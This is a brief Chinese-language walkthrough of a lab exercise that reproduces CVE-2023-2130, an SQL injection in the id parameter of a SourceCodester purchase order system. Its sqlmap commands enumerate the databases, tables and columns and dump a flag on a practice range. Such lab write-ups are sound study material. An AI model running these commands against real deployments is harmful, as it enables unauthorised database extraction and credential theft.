前言
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
一、复现环境
靶场:春秋云镜 CVE-2023-2130
二、复现步骤
根据提示,/admin/suppliers/view_details.php?id=1处存在sql注入,使用sqlmap进行注入
py sqlmap.py -u http://eci-2zeg2kupatj98zw1go74.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -dbs
发现存在注入漏洞,并且爆出数据库,继续爆表
py sqlmap.py -u http://eci-2zeg2kupatj98zw1go74.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -tables
继续爆字段
py sqlmap.py -u http://eci-2zeg2kupatj98zw1go74.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -T users -C
py sqlmap.py -u http://eci-2zeg2kupatj98zw1go74.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -tables -T fllllaaaag -C flag -dump
欧克,结束